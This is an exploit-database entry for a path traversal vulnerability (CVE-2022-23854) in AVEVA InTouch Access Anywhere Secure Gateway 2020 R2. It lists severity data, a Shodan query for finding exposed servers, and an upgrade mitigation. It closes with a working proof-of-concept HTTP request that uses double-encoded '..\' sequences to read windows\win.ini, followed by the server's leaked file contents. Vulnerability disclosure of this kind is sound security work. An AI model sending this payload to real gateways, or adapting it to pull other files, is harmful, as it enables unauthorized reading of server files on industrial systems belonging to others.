header-logo
Suggest Exploit
vendor:
Access Anywhere Secure Gateway
by:
Jens Regel (CRISEC IT-Security)
8.8
CVSS
HIGH
Path Traversal
22
CWE
Product Name: Access Anywhere Secure Gateway
Affected Version From: Access Anywhere Secure Gateway versions 2020 R2 and older
Affected Version To: Access Anywhere Secure Gateway versions 2020 R2
Patch Exists: Yes
Related CWE: CVE-2022-23854
CPE: a:aveva:access_anywhere_secure_gateway:2020_r2
Metasploit:
Other Scripts:
Tags: lfi,packetstorm,cve,cve2022,aveva,intouch
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.html:"InTouch Access Anywhere"', 'verified': True, 'vendor': 'aveva', 'product': 'intouch_access_anywhere'}
Platforms Tested: Windows
2022

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 – Path Traversal

A path traversal vulnerability in Access Anywhere Secure Gateway versions 2020 R2 and older allows an attacker to read arbitrary files on the server. This is achieved by sending a specially crafted HTTP request containing a path traversal sequence of '../../../../../../../../windows/win.ini' to the server.

Mitigation:

Upgrade to Access Anywhere Secure Gateway 2020 R3 or later.
Source

Exploit-DB raw data:

Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older

Proof of Concept:
GET 
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini 
HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1